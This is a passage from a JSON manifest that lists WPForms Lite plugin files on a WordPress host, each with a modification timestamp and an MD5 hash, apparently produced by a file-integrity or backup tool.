ome2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-setup.php\":{\"d\":1568732563,\"h\":\"35f104f38cb20dba227afa4b0361b38d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-payments.php\":{\"d\":1568732563,\"h\":\"6de6796b790e68a1c312840ce1c4c088\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-settings.php\":{\"d\":1568732563,\"h\":\"69de9ac894e77bbde3d7174f6c61c4f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-providers.php\":{\"d\":1568732563,\"h\":\"d2b76fa1aa0e3ba21e27c0bd07bfbdee\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/functions.php\":{\"d\":1568732563,\"h\":\"44a439f8b8873e9a23bceb949a1373bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/class-builder.php\":{\"d\":1568732563,\"h\":\"a9fb65d8214a940583204663bf6c6ca1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/interface.php\":{\"d\":1568732563,\"h\":\"e852446e6000246acf7e52870fe503a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-ninja-forms.php\":{\"d\":1568732563,\"h\":\"8ea7d8ca41f5dcc44187340ea5819f7f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-install-silent-skin.php\":{\"d\":1568732563,\"h\":\"d0e4bb45594b216f84f8ca68ea0b546e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-base.php\":{\"d\":1568732563,\"h\":\"b8b81ab3e3b954675636bc800531f0b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-contact-form-7.php\":{\"d\":1568732563,\"h\":\"da7e8d371a849f720277e3ab3aafd130\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-pirate-forms.php\":{\"d\":1568732563,\"h\":\"bb89c4384f473a9437cd31bf3ddceb15\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-am-deactivation-survey.php\":{\"d\":1568732563,\"h\":\"a6d8a18334753c696f8fa1a882d1989a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-am-notification.php\":{\"d\":1568732563,\"h\":\"1b0574d48d2efd2071c0e8e22bb7c61c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/admin.php\":{\"d\":1568732563,\"h\":\"c643f4fa6acb6000a51b5097fb11d3c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-notices.php\":{\"d\":1568732563,\"h\":\"ebc30541519784062dbd35ac7b70ce4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/settings-api.php\":{\"d\":1568732563,\"h\":\"cf51ea0779238c4c07fd78278fc8c501\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-welcome.php\":{\"d\":1568732563,\"h\":\"c8f58a38ee8f44c43b5ee8106016c994\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-install-skin.php\":{\"d\":1568732563,\"h\":\"3174227e68a7e296f0947f19e85c461d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-about.php\":{\"d\":1568732563,\"h\":\"3f43be38ce4d31f4ad68323304696200\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-editor.php\":{\"d\":1568732563,\"h\":\"daf96f35869691c1cf15560e61db07e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-importers.php\":{\"d\":1568732563,\"h\":\"95101e5e7f504d906605558adcfe85ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-tools.php\":{\"d\":1568732563,\"h\":\"edac589ec33f34822a601422fe28865f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/ajax-actions.php\":{\"d\":1568732563,\"h\":\"2b74ff4a881edf5637126718f11de010\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-menu.php\":{\"d\":1568732563,\"h\":\"f873dffdc2fe5fb8db535a1f4f0efeaf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-settings.php\":{\"d\":1568732563,\"h\":\"a838d978ffbcac450a1d658a35883d52\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-review.php\":{\"d\":1568732563,\"h\":\"10515e57466228cd0754a74299fb01fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/default.php\":{\"d\":1568732563,\"h\":\"3b521da97fb6c8f601322aa6d3315262\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/body-default.php\":{\"d\":1568732563,\"h\":\"06a2a297c4063dfed6b9f1e4667abd88\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/footer-default.php\":{\"d\":1568732563,\"h\":\"5ea8be5c9c8ff0c2bcda84243979ba24\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/header-default.php\":{\"d\":1568732563,\"h\":\"e592e4bc57cad186e45ac72791fa8283\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/field-default.php\":{\"d\":1568732563,\"h\":\"6be3f2aeb08440869a90e5a45eb0cc35\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/class-emails.php\":{\"d\":1568732563,\"h\":\"d03c2c34cd71eb7c2983a2f0321efbd3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/analytics\\/class-base.php\":{\"d\":1568732563,\"h\":\"583965e71509a9551e2f78301d08cce1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/analytics\\/class-monster-insights.php\":{\"d\":1568732563,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-radio.php\":{\"d\":1568732563,\"h\":\"cfb10af91c905016f1c18f0b4dbd3344\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-name.php\":{\"d\":1568732563,\"h\":\"946d1dbeee571379a2f5c58aa4dbee45\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-gdpr-checkbox.php\":{\"d\":1568732563,\"h\":\"1d423e586c8025acbe8972528ea557c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-textarea.php\":{\"d\":1568732563,\"h\":\"3cd9aec36103de1679482a9a1ec6a284\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-text.php\":{\"d\":1568732563,\"h\":\"88b11089ab6acf8ccd8942b4623a579c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-email.php\":{\"d\":1568732563,\"h\":\"72c4070af5612e6f4d285f33b3298223\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-base.php\":{\"d\":1568732563,\"h\":\"b72e83b43967f9cb8b22dd073d10a489\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-number.php\":{\"d\":1568732563,\"h\":\"0d5cd78423c66d0e564859ede9e76b42\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-checkbox.php\":{\"d\":1568732563,\"h\":\"c82a0c56a6a621f21af6490e95ae01c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-select.php\":{\"d\":1568732563,\"h\":\"0da58fd4b8762b675fd0c945f8e6a7c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-smart-tags.php\":{\"d\":1568732563,\"h\":\"ea5d060575947e98e4061ca0fbe40cc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/functions.php\":{\"d\":1568732563,\"h\":\"13adf0c66da419c2f89edf234d0bb408\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-templates.php\":{\"d\":1568732563,\"h\":\"4b214b3b2dfeaaf6d4ab2ea8bb38d446\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-install.php\":{\"d\":1568732563,\"h\":\"9306d4dd837b7997831e885f15ce54fa\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-fields.php\":{\"d\":1568732563,\"h\":\"a4b792048e381fd3ef54df83449b7970\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/integrations.php\":{\"d\":1568732563,\"h\":\"ebd32d57472c8beac93da38caff720ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-conditional-logic-core.php\":{\"d\":1568732563,\"h\":\"603bb2df1db39790180feb2d79254fc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-logging.php\":{\"d\":1568732563,\"h\":\"74c69861c517ee02c44ee8a6f992d79e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-form.php\":{\"d\":1568732563,\"h\":\"47842545286afb48f0ed81962d90be43\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-widget.php\":{\"d\":1568732563,\"h\":\"458f0b6c8e979771ffd84a8e94a11b99\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-frontend.php\":{\"d\":1568732563,\"h\":\"ab351b7402017ab79b857ac3435b8e1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-providers.php\":{\"d\":1568732563,\"h\":\"2a1ffbe845d32c7c07a7e0ff06448390\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-process.php\":{\"d\":1568732563,\"h\":\"59ab72d8f39551bf11c62103c49a3db8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/languages\\/wpforms-lite.pot\":{\"d\":1568732563,\"h\":\"0b24615d5821a66e0a96de3b0c38bd26\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/settings-education.min.js\":{\"d\":1568732563,\"h\":\"61195deae016909858b77fc274df6a9d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/builder-education.min.js\":{\"d\":1568732563,\"h\":\"b62e0202427077e162be701fc6d0e2ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/builder-education.js\":{\"d\":1568732563,\"h\":\"045a9818bd6612f7800436c2c6fa522e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/settings-education.js\":{\"d\":1568732563,\"h\":\"debef6d18e056240263bdb06cae144c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/connect.min.js\":{\"d\":1568732563,\"h\":\"a30544c9fa3e3e484c06ec649f758442\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/dashboard-widget.js\":{\"d\":1568732563,\"h\":\"d7cfb7db7759833134e9438728c9d187\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/connect.js\":{\"d\":1568732563,\"h\":\"72497c8caca8041b604ec25dc762280e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/dashboard-widget.min.js\":{\"d\":1568732563,\"h\":\"5d7775a09926d9a982bf8979810bbd80\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin-builder-lite.js\":{\"d\":1568732563,\"h\":\"fb9da8d61c06c4f7defd501a17fbd3cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/wpforms-lite.php\":{\"d\":1568732563,\"h\":\"2e4b74a83f74043ef6745a169cc89f84\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/src\\/Css\\/Property\\/Processor.php\":{\"d\":1568732563,\"h\":\"72044c9b8a5a543c8000120745f28bdb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/src\\/Css\\/Property\\/Property.php\":{\"d\":1568732563,\"h\":\"460d6514ddad0a99fbac12622731372b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/src\\/Css\\/Rule\\/Rule.php\":{\"d\":1568732563,\"h\":\"4b52fb4c6cc0d20332aeff0daad2cfc7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/src\\/Css\\/Rule\\/Processor.php\":{\"d\":1568732563,\"h\":\"a4dc9a9cdd611733784deaeed2964aee\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/src\\/Css\\/Processor.php\":{\"d\":1568732563,\"h\":\"af4f5b3de2734eff4c9be1ee298b0c67\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/src\\/CssToInlineStyles.php\":{\"d\":1568732563,\"h\":\"6ed74e091caa302022941b06cbc16ded\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/composer.json\":{\"d\":1568732563,\"h\":\"b47af784f636dd00686932b61a944608\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/phpunit.xml.dist\":{\"d\":1568732563,\"h\":\"cad2b299ffd43bc5eee35b0828842912\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/tijsverkoyen\\/css-to-inline-styles\\/LICENSE.md\":{\"d\":1568732563,\"h\":\"8f8003c3b0bda54e864b2a15406736cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/installed.json\":{\"d\":1568732563,\"h\":\"464afe39891cb87c29ef26f9a1a5cc06\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/autoload_static.php\":{\"d\":1568732563,\"h\":\"c127e648cc40c150a3bc55a4fd0fef57\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/autoload_classmap.php\":{\"d\":1568732563,\"h\":\"8645d3a4e3ad87e7cf4d88a46717aab4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/autoload_real.php\":{\"d\":1568732563,\"h\":\"9230486a949c9dabc80e8bd1938b1907\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/ClassLoader.php\":{\"d\":1568732563,\"h\":\"a0899dd7d97c25fe1d872a542afa6081\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/autoload_files.php\":{\"d\":1568732563,\"h\":\"cefd229d88176638c2f2ab49b09d080a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/autoload_psr4.php\":{\"d\":1568732563,\"h\":\"7bf7a561b92c34471415050ac8ca13cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/autoload_namespaces.php\":{\"d\":1568732563,\"h\":\"03b1224cbaec4583459dffccffb6d2d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/composer\\/LICENSE\":{\"d\":1568732563,\"h\":\"955d5fe58c231244f6b49000f383b5e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/scripts\\/bundle-devtools.sh\":{\"d\":1568732563,\"h\":\"410a64fe8db1446118354a8f5e893c08\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Protocol\\/ExporterInterfaceTest.php\":{\"d\":1568732563,\"h\":\"20bceeb1cc39f363a9dfab1c7652a34c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Unit\\/Collection\\/CallbackCollectionTest.php\":{\"d\":1568732563,\"h\":\"60e509372426451e42de9a69480473e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Unit\\/Collection\\/SampleAggIterator.php\":{\"d\":1568732563,\"h\":\"5ca9c2790b8f88f2de00223196bb2399\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Unit\\/ExporterConfigTest.php\":{\"d\":1568732563,\"h\":\"537c6f8a252e6612b2fdf5a72d5a3007\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Join\\/Collection\\/PdoCollectionTest.php\":{\"d\":1568732563,\"h\":\"408a4da5f673098f109a1bf226a3bc22\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Join\\/csv_files\\/euc-jp.csv\":{\"d\":1568732563,\"h\":\"d04a6d093d31b16b33e1645c0152ed67\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Join\\/csv_files\\/multiple-lines.csv\":{\"d\":1568732563,\"h\":\"c188e2f0b401b22e7d3353956990cbf7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Join\\/csv_files\\/utf-8.csv\":{\"d\":1568732563,\"h\":\"5f69f8bcd2230cd57c34f610e619d050\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Join\\/UsageTest.php\":{\"d\":1568732563,\"h\":\"42a711faa998aa8a8427dd37d00645dc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Tests\\/Standard\\/Join\\/ExporterTest.php\":{\"d\":1568732563,\"h\":\"24270949e3d4cf7da6f09f452d175ba9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Protocol\\/Exception\\/IOException.php\":{\"d\":1568732563,\"h\":\"c693da10cceecba1fda9ec7d3d7c1465\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Protocol\\/ExporterInterface.php\":{\"d\":1568732563,\"h\":\"c442b295f4867c7ce82734d5ae992bc9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Standard\\/Exception\\/StrictViolationException.php\":{\"d\":1568732563,\"h\":\"c1fceb4098526554b687c23fbb9d491b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Standard\\/Collection\\/CallbackCollection.php\":{\"d\":1568732563,\"h\":\"e2d77eba82a0d5b98b179c8ed164c41d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Standard\\/Collection\\/PdoCollection.php\":{\"d\":1568732563,\"h\":\"f910b42cfdef2ef2e170d974fde00513\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Standard\\/CsvFileObject.php\":{\"d\":1568732563,\"h\":\"ac3b9046621c528cfec087fc459aef0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Standard\\/Exporter.php\":{\"d\":1568732563,\"h\":\"d948d802a5c363ed42a6a530ab471f2d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Export\\/Standard\\/ExporterConfig.php\":{\"d\":1568732563,\"h\":\"390e7e5b9dac6cc4124df87f3c39ef23\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Protocol\\/LexerTest.php\":{\"d\":1568732563,\"h\":\"1cd2aad5502b74513ac81dd2e95706b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Protocol\\/InterpreterTest.php\":{\"d\":1568732563,\"h\":\"55a918f6549985fba00f2fa4b075fec9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Unit\\/Observer\\/SqlObserverTest.php\":{\"d\":1568732563,\"h\":\"41a6307baebb28e4722b1789611fe44c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Unit\\/StreamFilter\\/ConvertMbstringEncodingTest.php\":{\"d\":1568732563,\"h\":\"5aab9b3891db9d569caec44ef8921387\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Unit\\/LexerConfigTest.php\":{\"d\":1568732563,\"h\":\"b5f94db02f1d0c5254c8a3ccd7b7d089\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Unit\\/InterpreterTest.php\":{\"d\":1568732563,\"h\":\"eeeecf0a593ea46672680a5f4d618e93\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Join\\/Observer\\/PdoObserverTest.php\":{\"d\":1568732563,\"h\":\"a1202aa30f1166ab1cbcdbb827173f90\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Join\\/csv_files\\/tab-separated.csv\":{\"d\":1568732563,\"h\":\"d301ee50db1fe28b836d919061759c0e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Join\\/csv_files\\/sjis.csv\":{\"d\":1568732563,\"h\":\"8bf720951cdcdb9fada6908f84a268f1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Join\\/csv_files\\/colon-separated.csv\":{\"d\":1568732563,\"h\":\"68f0382d2d16165658140e1cb877b8ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/vendor\\/goodby\\/csv\\/src\\/Goodby\\/CSV\\/Import\\/Tests\\/Standard\\/Join\\/csv_files\\/utf-8.csv\":{\"d\":1568732563,\"h\":\"469e1317a75d7fc647f6d2a67d572b25\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\